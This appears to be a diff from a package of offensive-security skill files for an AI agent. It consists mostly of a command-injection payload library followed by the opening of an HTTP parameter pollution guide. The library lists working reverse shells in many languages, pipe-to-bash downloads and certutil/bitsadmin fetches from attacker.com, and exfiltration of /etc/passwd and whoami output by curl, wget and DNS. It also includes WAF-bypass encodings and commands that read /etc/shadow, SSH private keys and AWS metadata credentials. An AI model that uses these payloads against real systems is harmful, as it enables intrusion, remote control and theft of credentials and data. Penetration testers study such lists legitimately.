- package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md +266 -0
- package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md +226 -0
- package/skills/offensive/airecon-fork/technologies-firebase-firestore/SKILL.md +213 -0
- package/skills/offensive/airecon-fork/technologies-frida-hooking/SKILL.md +387 -0
- package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md +259 -0
- package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md +256 -0
- package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md +281 -0
- package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md +230 -0
- package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md +257 -0
- package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md +280 -0
- package/skills/offensive/airecon-fork/technologies-observability-stack-attacks/SKILL.md +501 -0
- package/skills/offensive/airecon-fork/technologies-redis/SKILL.md +236 -0
- package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md +232 -0
- package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md +351 -0
- package/skills/offensive/airecon-fork/tools-browser-automation/SKILL.md +300 -0
- package/skills/offensive/airecon-fork/tools-caido/SKILL.md +776 -0
- package/skills/offensive/airecon-fork/tools-code-review/SKILL.md +71 -0
- package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md +189 -0
- package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md +258 -0
- package/skills/offensive/airecon-fork/tools-impacket/SKILL.md +227 -0
- package/skills/offensive/airecon-fork/tools-install/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/tools-nmap/SKILL.md +211 -0
- package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md +175 -0
- package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
- package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
- package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
- package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
- package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
- package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
- package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
- package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
- package/skills/offensive/matty-fork/cicd-redteam/SKILL.md +531 -0
- package/skills/offensive/matty-fork/cloud-security/SKILL.md +106 -0
- package/skills/offensive/matty-fork/container-escape/SKILL.md +174 -0
- package/skills/offensive/matty-fork/mobile-pentester/SKILL.md +357 -0
- package/skills/offensive/matty-fork/subdomain-takeover/SKILL.md +154 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/README.md +92 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/SKILL.md +4177 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/README.md +66 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/SKILL.md +1695 -0
|
@@ -0,0 +1,459 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
# Full Command Injection Payload Library
|
|
4
|
+
|
|
5
|
+
## Unix/Linux Command Injection
|
|
6
|
+
|
|
7
|
+
### Basic Payloads
|
|
8
|
+
```
|
|
9
|
+
;id
|
|
10
|
+
|id
|
|
11
|
+
&id
|
|
12
|
+
&&id
|
|
13
|
+
|id;id
|
|
14
|
+
||id
|
|
15
|
+
; ls
|
|
16
|
+
| ls
|
|
17
|
+
& ls
|
|
18
|
+
&& ls
|
|
19
|
+
|ls
|
|
20
|
+
||ls
|
|
21
|
+
`id`
|
|
22
|
+
$(id)
|
|
23
|
+
${IFS}id
|
|
24
|
+
;id
|
|
25
|
+
%0aid
|
|
26
|
+
\nid
|
|
27
|
+
id
|
|
28
|
+
;id
|
|
29
|
+
```
|
|
30
|
+
|
|
31
|
+
### Blind Injection
|
|
32
|
+
```
|
|
33
|
+
; sleep 5
|
|
34
|
+
| sleep 5
|
|
35
|
+
& sleep 5
|
|
36
|
+
&& sleep 5
|
|
37
|
+
|| sleep 5
|
|
38
|
+
; sleep 5 #
|
|
39
|
+
;ping -c 5 127.0.0.1
|
|
40
|
+
;mkfifo /tmp/pipe;sh /tmp/pipe | nc attacker.com 4444 | /bin/sh >/tmp/pipe
|
|
41
|
+
```
|
|
42
|
+
|
|
43
|
+
### Time-Based Blind
|
|
44
|
+
```
|
|
45
|
+
; sleep 5
|
|
46
|
+
& sleep 5
|
|
47
|
+
| sleep 5
|
|
48
|
+
&& sleep 5
|
|
49
|
+
|| sleep 5
|
|
50
|
+
; sleep 5 --
|
|
51
|
+
; sleep 5 #
|
|
52
|
+
```
|
|
53
|
+
|
|
54
|
+
### Reverse Shell Payloads
|
|
55
|
+
|
|
56
|
+
### Bash Reverse Shell
|
|
57
|
+
```
|
|
58
|
+
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
|
|
59
|
+
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
|
|
60
|
+
0<&196;exec 196<>/dev/tcp/ATTACKER_IP/PORT; sh <&196 >&196 2>&196
|
|
61
|
+
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'
|
|
62
|
+
exec /bin/sh 0<&2 1>&2
|
|
63
|
+
/bin/sh -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
|
|
64
|
+
```
|
|
65
|
+
|
|
66
|
+
### Netcat Reverse Shell
|
|
67
|
+
```
|
|
68
|
+
nc -e /bin/sh ATTACKER_IP PORT
|
|
69
|
+
nc -e /bin/bash ATTACKER_IP PORT
|
|
70
|
+
nc -c /bin/sh ATTACKER_IP PORT
|
|
71
|
+
/bin/nc ATTACKER_IP PORT
|
|
72
|
+
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f
|
|
73
|
+
```
|
|
74
|
+
|
|
75
|
+
### Python Reverse Shell
|
|
76
|
+
```
|
|
77
|
+
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
|
78
|
+
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
|
79
|
+
python -c "import os;os.system('bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1')"
|
|
80
|
+
```
|
|
81
|
+
|
|
82
|
+
### Perl Reverse Shell
|
|
83
|
+
```
|
|
84
|
+
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ATTACKER_IP:PORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
|
85
|
+
perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
|
|
86
|
+
perl -e "exec qq{/bin/sh -i} if fork"
|
|
87
|
+
```
|
|
88
|
+
|
|
89
|
+
### PHP Reverse Shell
|
|
90
|
+
```
|
|
91
|
+
php -r '$s=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
|
|
92
|
+
php -r '$s=fsockopen("ATTACKER_IP",PORT);$d="/bin/sh -i";$p=proc_open($d,array(0=>$s,1=>$s,2=>$s),$pipes);'
|
|
93
|
+
<?php system("bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1");?>
|
|
94
|
+
<?php exec("bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1");?>
|
|
95
|
+
<?php shell_exec("bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1");?>
|
|
96
|
+
<?php passthru("bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1");?>
|
|
97
|
+
```
|
|
98
|
+
|
|
99
|
+
### Ruby Reverse Shell
|
|
100
|
+
```
|
|
101
|
+
ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
|
102
|
+
ruby -rsocket -e'p=Process.spawn("/bin/sh -i <&3 >&3 2>&3");f=TCPSocket.new("ATTACKER_IP","PORT");f.fcntl(Fcntl::F_SETFD,Fcntl::FD_CLOEXEC);'
|
|
103
|
+
```
|
|
104
|
+
|
|
105
|
+
### Node.js Reverse Shell
|
|
106
|
+
```
|
|
107
|
+
node -e "var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []); var client = new net.Socket(); client.connect(PORT, 'ATTACKER_IP', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"
|
|
108
|
+
```
|
|
109
|
+
|
|
110
|
+
### Telnet Reverse Shell
|
|
111
|
+
```
|
|
112
|
+
telnet ATTACKER_IP PORT | /bin/sh | telnet ATTACKER_IP PORT2
|
|
113
|
+
```
|
|
114
|
+
|
|
115
|
+
### PowerShell Reverse Shell
|
|
116
|
+
```
|
|
117
|
+
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$c = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);$s = $c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -gt 0){$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$p = (new-object System.Diagnostics.Process);$p.StartInfo = New-Object System.Diagnostics.ProcessStartInfo('cmd.exe');$p.StartInfo.RedirectStandardInput = $true;$p.StartInfo.RedirectStandardOutput = $true;$p.StartInfo.RedirectStandardError = $true;$p.StartInfo.UseShellExecute = $false;$p.Start();$p.StandardInput.WriteLine($d);$o = $p.StandardOutput.ReadToEnd();$c.Close();}"
|
|
118
|
+
```
|
|
119
|
+
|
|
120
|
+
### Curl/Wget to Upload
|
|
121
|
+
```
|
|
122
|
+
curl http://attacker.com/shell.sh | bash
|
|
123
|
+
wget -O- http://attacker.com/shell.sh | bash
|
|
124
|
+
```
|
|
125
|
+
|
|
126
|
+
### Socat Reverse Shell
|
|
127
|
+
```
|
|
128
|
+
socat exec:'bash -i',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:PORT
|
|
129
|
+
```
|
|
130
|
+
|
|
131
|
+
### GCHQ Payloads
|
|
132
|
+
```
|
|
133
|
+
0<&196;exec 196<>/dev/tcp/ATTACKER_IP/PORT; sh <&196 >&196 2>&196
|
|
134
|
+
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKER_IP PORT 0/tmp/p
|
|
135
|
+
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
|
136
|
+
```
|
|
137
|
+
|
|
138
|
+
## Windows Command Injection
|
|
139
|
+
|
|
140
|
+
### Basic Payloads
|
|
141
|
+
```
|
|
142
|
+
;whoami
|
|
143
|
+
&whoami
|
|
144
|
+
&&whoami
|
|
145
|
+
|whoami
|
|
146
|
+
||whoami
|
|
147
|
+
%0Awhoami
|
|
148
|
+
%0Dwhoami
|
|
149
|
+
%00whoami
|
|
150
|
+
cmd /c whoami
|
|
151
|
+
cmd /c "whoami"
|
|
152
|
+
```
|
|
153
|
+
|
|
154
|
+
### PowerShell Payloads
|
|
155
|
+
```
|
|
156
|
+
powershell -Command "whoami"
|
|
157
|
+
powershell -c "whoami"
|
|
158
|
+
powershell.exe -NoP -NonI -W Hidden -Command "whoami"
|
|
159
|
+
powershell -e "cABhAHMAcAA="
|
|
160
|
+
```
|
|
161
|
+
|
|
162
|
+
### SMB Relay
|
|
163
|
+
```
|
|
164
|
+
\\\\attacker.com\\share\\payload.exe
|
|
165
|
+
\\attacker.com\share\payload.exe
|
|
166
|
+
```
|
|
167
|
+
|
|
168
|
+
### MSHTA
|
|
169
|
+
```
|
|
170
|
+
mshta vbscript:Execute("CreateObject("WScript.Shell").Run("cmd /c whoami"):Close")
|
|
171
|
+
mshta javascript:Close(Execute("CreateObject("WScript.Shell").Run("cmd /c whoami")"))
|
|
172
|
+
```
|
|
173
|
+
|
|
174
|
+
### Certutil
|
|
175
|
+
```
|
|
176
|
+
certutil -urlcache -f http://attacker.com/payload.exe payload.exe
|
|
177
|
+
certutil -decode payload.b64 payload.exe
|
|
178
|
+
```
|
|
179
|
+
|
|
180
|
+
### Bitsadmin
|
|
181
|
+
```
|
|
182
|
+
bitsadmin /transfer download http://attacker.com/payload.exe %TEMP%\payload.exe
|
|
183
|
+
```
|
|
184
|
+
|
|
185
|
+
### WebDAV
|
|
186
|
+
```
|
|
187
|
+
copy \\attacker.com\share\payload.exe %TEMP%\payload.exe
|
|
188
|
+
```
|
|
189
|
+
|
|
190
|
+
## WAF Bypass Techniques
|
|
191
|
+
|
|
192
|
+
### Whitespace Bypass
|
|
193
|
+
```
|
|
194
|
+
id%0A
|
|
195
|
+
id%0D
|
|
196
|
+
id%09
|
|
197
|
+
id%0bid%0aid%0c
|
|
198
|
+
id%00
|
|
199
|
+
id|ls
|
|
200
|
+
id;ls
|
|
201
|
+
id&&ls
|
|
202
|
+
id||ls
|
|
203
|
+
```
|
|
204
|
+
|
|
205
|
+
### Character Insertion
|
|
206
|
+
```
|
|
207
|
+
i\x64
|
|
208
|
+
w\x68\x6f\x61\x6d\x69
|
|
209
|
+
```
|
|
210
|
+
|
|
211
|
+
### Encoding
|
|
212
|
+
```
|
|
213
|
+
echo YWRtaW4= | base64 -d
|
|
214
|
+
echo 6964 | xxd -r -p
|
|
215
|
+
printf '\x69\x64'
|
|
216
|
+
```
|
|
217
|
+
|
|
218
|
+
### Variable Substitution
|
|
219
|
+
```
|
|
220
|
+
$(echo $((7*7)))
|
|
221
|
+
`echo $((7*7))`
|
|
222
|
+
```
|
|
223
|
+
|
|
224
|
+
### Random Case
|
|
225
|
+
```
|
|
226
|
+
I\x64
|
|
227
|
+
WHOAMI
|
|
228
|
+
who\x61mi
|
|
229
|
+
```
|
|
230
|
+
|
|
231
|
+
## Path Traversal in Commands
|
|
232
|
+
```
|
|
233
|
+
;cat /etc/passwd
|
|
234
|
+
;cat ../../../../etc/passwd
|
|
235
|
+
;cat ..//..//..//..//etc/passwd
|
|
236
|
+
;cat /etc/../etc/passwd
|
|
237
|
+
;cat /etc/passwd/../../etc/passwd
|
|
238
|
+
```
|
|
239
|
+
|
|
240
|
+
## Environment Variables
|
|
241
|
+
```
|
|
242
|
+
;echo $PATH
|
|
243
|
+
;echo $HOME
|
|
244
|
+
;echo $USER
|
|
245
|
+
;echo $PWD
|
|
246
|
+
;env
|
|
247
|
+
;printenv
|
|
248
|
+
;set
|
|
249
|
+
```
|
|
250
|
+
|
|
251
|
+
## File Operations
|
|
252
|
+
```
|
|
253
|
+
;ls -la /
|
|
254
|
+
;ls -la /var/www/html
|
|
255
|
+
;ls -la /tmp
|
|
256
|
+
;cat /etc/passwd
|
|
257
|
+
;cat /etc/shadow
|
|
258
|
+
;cat /etc/hosts
|
|
259
|
+
;touch /tmp/test
|
|
260
|
+
;mkdir /tmp/test
|
|
261
|
+
;rm -rf /tmp/test
|
|
262
|
+
;cp /etc/passwd /tmp/passwd
|
|
263
|
+
;mv /etc/passwd /tmp/passwd
|
|
264
|
+
```
|
|
265
|
+
|
|
266
|
+
## Network Enumeration
|
|
267
|
+
```
|
|
268
|
+
;ifconfig
|
|
269
|
+
;ip addr
|
|
270
|
+
;netstat -an
|
|
271
|
+
;ss -tulpn
|
|
272
|
+
;arp -a
|
|
273
|
+
;route -n
|
|
274
|
+
;hostname -I
|
|
275
|
+
```
|
|
276
|
+
|
|
277
|
+
## Process Enumeration
|
|
278
|
+
```
|
|
279
|
+
;ps aux
|
|
280
|
+
;ps -ef
|
|
281
|
+
;top -n 1
|
|
282
|
+
;lsof -i
|
|
283
|
+
```
|
|
284
|
+
|
|
285
|
+
## Service Exploitation
|
|
286
|
+
```
|
|
287
|
+
;systemctl status ssh
|
|
288
|
+
;service ssh status
|
|
289
|
+
;service --status-all
|
|
290
|
+
```
|
|
291
|
+
|
|
292
|
+
## Database Connection
|
|
293
|
+
```
|
|
294
|
+
;mysql -u root -p -e "SELECT * FROM users;"
|
|
295
|
+
;psql -U postgres -c "SELECT * FROM users;"
|
|
296
|
+
;mongo --eval "db.users.find()"
|
|
297
|
+
;sqlite3 database.db ".tables"
|
|
298
|
+
```
|
|
299
|
+
|
|
300
|
+
## sudo Exploitation
|
|
301
|
+
```
|
|
302
|
+
;sudo -l
|
|
303
|
+
;sudo su
|
|
304
|
+
;sudo bash
|
|
305
|
+
```
|
|
306
|
+
|
|
307
|
+
## Cron Jobs
|
|
308
|
+
```
|
|
309
|
+
;crontab -l
|
|
310
|
+
;ls -la /etc/cron.d/
|
|
311
|
+
;ls -la /etc/cron.daily/
|
|
312
|
+
;ls -la /etc/cron.hourly/
|
|
313
|
+
```
|
|
314
|
+
|
|
315
|
+
## SSH Keys
|
|
316
|
+
```
|
|
317
|
+
;ls -la ~/.ssh/
|
|
318
|
+
;cat ~/.ssh/id_rsa
|
|
319
|
+
;cat ~/.ssh/authorized_keys
|
|
320
|
+
```
|
|
321
|
+
|
|
322
|
+
## Kernel Exploits
|
|
323
|
+
```
|
|
324
|
+
;uname -a
|
|
325
|
+
;cat /proc/version
|
|
326
|
+
;lsb_release -a
|
|
327
|
+
```
|
|
328
|
+
|
|
329
|
+
## Docker Breakout
|
|
330
|
+
```
|
|
331
|
+
;docker ps
|
|
332
|
+
;docker images
|
|
333
|
+
;docker inspect container_id
|
|
334
|
+
;docker exec container_id cat /etc/passwd
|
|
335
|
+
```
|
|
336
|
+
|
|
337
|
+
## Container Escape
|
|
338
|
+
```
|
|
339
|
+
;docker run --rm -v /:/host alpine chroot /host
|
|
340
|
+
;docker cp container_id:/etc/passwd /tmp/passwd
|
|
341
|
+
```
|
|
342
|
+
|
|
343
|
+
## AWS Metadata
|
|
344
|
+
```
|
|
345
|
+
;curl http://169.254.169.254/latest/meta-data/
|
|
346
|
+
;curl http://169.254.169.254/latest/user-data/
|
|
347
|
+
;wget -O- http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
|
348
|
+
```
|
|
349
|
+
|
|
350
|
+
## Git Exploitation
|
|
351
|
+
```
|
|
352
|
+
;git log
|
|
353
|
+
;git show
|
|
354
|
+
;git diff
|
|
355
|
+
;cat .git/config
|
|
356
|
+
;ls -la .git/
|
|
357
|
+
```
|
|
358
|
+
|
|
359
|
+
## Backup Files
|
|
360
|
+
```
|
|
361
|
+
;ls -la *.bak
|
|
362
|
+
;ls -la *.old
|
|
363
|
+
;ls -la *.swp
|
|
364
|
+
;ls -la *~
|
|
365
|
+
```
|
|
366
|
+
|
|
367
|
+
## Interesting Files
|
|
368
|
+
```
|
|
369
|
+
;cat /etc/httpd/conf/httpd.conf
|
|
370
|
+
;cat /etc/apache2/apache2.conf
|
|
371
|
+
;cat /etc/nginx/nginx.conf
|
|
372
|
+
;cat /etc/mysql/my.cnf
|
|
373
|
+
;cat /etc/postgresql/posgresql.conf
|
|
374
|
+
```
|
|
375
|
+
|
|
376
|
+
## Injection Points
|
|
377
|
+
|
|
378
|
+
### URL Parameter
|
|
379
|
+
```
|
|
380
|
+
/?q=;id
|
|
381
|
+
/search?q=||id
|
|
382
|
+
/page?id=1;id
|
|
383
|
+
/file?name=;id
|
|
384
|
+
```
|
|
385
|
+
|
|
386
|
+
### Header
|
|
387
|
+
```
|
|
388
|
+
X-Forwarded-Host:;id
|
|
389
|
+
User-Agent:;id
|
|
390
|
+
Referer:;id
|
|
391
|
+
Cookie:id=;id
|
|
392
|
+
```
|
|
393
|
+
|
|
394
|
+
### POST Data
|
|
395
|
+
```
|
|
396
|
+
name=test;id
|
|
397
|
+
cmd=;id
|
|
398
|
+
data=;id
|
|
399
|
+
```
|
|
400
|
+
|
|
401
|
+
### JSON
|
|
402
|
+
```
|
|
403
|
+
{"cmd":";id"}
|
|
404
|
+
{"file":";id"}
|
|
405
|
+
```
|
|
406
|
+
|
|
407
|
+
### XML
|
|
408
|
+
```
|
|
409
|
+
<cmd>;id</cmd>
|
|
410
|
+
<file>;id</file>
|
|
411
|
+
```
|
|
412
|
+
|
|
413
|
+
## Obfuscation
|
|
414
|
+
|
|
415
|
+
### Base64
|
|
416
|
+
```
|
|
417
|
+
;echo YWRtaW4= | base64 -d
|
|
418
|
+
;bash<<<$(echo YWRtaW4= | base64 -d)
|
|
419
|
+
```
|
|
420
|
+
|
|
421
|
+
### Hex
|
|
422
|
+
```
|
|
423
|
+
;echo 6964 | xxd -r -p
|
|
424
|
+
;printf '\x69\x64'
|
|
425
|
+
```
|
|
426
|
+
|
|
427
|
+
### URL Encoding
|
|
428
|
+
```
|
|
429
|
+
%3b%69%64
|
|
430
|
+
%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64
|
|
431
|
+
```
|
|
432
|
+
|
|
433
|
+
### Double Encoding
|
|
434
|
+
```
|
|
435
|
+
%253b%2569%2564
|
|
436
|
+
```
|
|
437
|
+
|
|
438
|
+
## Blind Command Injection
|
|
439
|
+
|
|
440
|
+
### DNS Exfiltration
|
|
441
|
+
```
|
|
442
|
+
;nslookup $(whoami).attacker.com
|
|
443
|
+
;curl http://attacker.com/$(whoami)
|
|
444
|
+
;wget http://attacker.com/$(whoami)
|
|
445
|
+
```
|
|
446
|
+
|
|
447
|
+
### Time-Based
|
|
448
|
+
```
|
|
449
|
+
;ping -c 5 127.0.0.1
|
|
450
|
+
;sleep 5
|
|
451
|
+
;timeout 5
|
|
452
|
+
```
|
|
453
|
+
|
|
454
|
+
### Output Extraction
|
|
455
|
+
```
|
|
456
|
+
;cat /etc/passwd > /tmp/out.txt
|
|
457
|
+
;curl -X POST -d @/tmp/out.txt http://attacker.com
|
|
458
|
+
;wget --post-file=/tmp/out.txt http://attacker.com
|
|
459
|
+
```
|
|
@@ -0,0 +1,129 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
# HTTP Parameter Pollution (HPP) Payloads
|
|
4
|
+
|
|
5
|
+
## Overview
|
|
6
|
+
HPP abuses duplicate or ambiguous parameters to bypass validation, override
|
|
7
|
+
values, or trigger inconsistent parsing between proxies, WAFs, and apps.
|
|
8
|
+
|
|
9
|
+
## Prerequisites
|
|
10
|
+
```bash
|
|
11
|
+
apt-get install -y jq
|
|
12
|
+
```
|
|
13
|
+
|
|
14
|
+
## Phase 1: Identify Candidate Endpoints
|
|
15
|
+
```bash
|
|
16
|
+
# Look for endpoints with sensitive parameters
|
|
17
|
+
# Examples: id, user, role, redirect, price, amount, filter, sort, next, return
|
|
18
|
+
|
|
19
|
+
# If you have URL lists
|
|
20
|
+
rg -n "\?|&" /workspace/output/urls.txt \
|
|
21
|
+
| tee /workspace/output/TARGET_hpp_candidates.txt
|
|
22
|
+
```
|
|
23
|
+
|
|
24
|
+
## Phase 2: Determine Parameter Precedence
|
|
25
|
+
```bash
|
|
26
|
+
TARGET_URL="https://TARGET/endpoint"
|
|
27
|
+
|
|
28
|
+
# Marker values to see which wins
|
|
29
|
+
curl -s "$TARGET_URL?role=user&role=admin" \
|
|
30
|
+
| tee /workspace/output/TARGET_hpp_precedence_1.txt
|
|
31
|
+
|
|
32
|
+
curl -s "$TARGET_URL?role=admin&role=user" \
|
|
33
|
+
| tee /workspace/output/TARGET_hpp_precedence_2.txt
|
|
34
|
+
|
|
35
|
+
# If reflections exist
|
|
36
|
+
rg -n "user|admin" /workspace/output/TARGET_hpp_precedence_*.txt \
|
|
37
|
+
> /workspace/output/TARGET_hpp_precedence_hits.txt
|
|
38
|
+
```
|
|
39
|
+
|
|
40
|
+
## Phase 3: Payload List
|
|
41
|
+
```bash
|
|
42
|
+
cat > /workspace/output/TARGET_hpp_payloads.txt <<'PAYLOADS'
|
|
43
|
+
# Duplicate parameters (last-wins vs first-wins)
|
|
44
|
+
param=1¶m=2
|
|
45
|
+
param=2¶m=1
|
|
46
|
+
|
|
47
|
+
# Array-style parameters (framework-dependent)
|
|
48
|
+
param[]=1¶m[]=2
|
|
49
|
+
param[0]=1¶m[1]=2
|
|
50
|
+
param[a]=1¶m[b]=2
|
|
51
|
+
|
|
52
|
+
# Mixed encoding
|
|
53
|
+
param=1¶m=%32
|
|
54
|
+
param=%31¶m=2
|
|
55
|
+
param=%2fetc%2fpasswd¶m=ok
|
|
56
|
+
|
|
57
|
+
# Separator smuggling (server-specific)
|
|
58
|
+
param=1;param=2
|
|
59
|
+
param=1|param=2
|
|
60
|
+
param=1,param=2
|
|
61
|
+
|
|
62
|
+
# Query vs body conflict
|
|
63
|
+
# GET: ?role=user + POST body role=admin
|
|
64
|
+
role=user
|
|
65
|
+
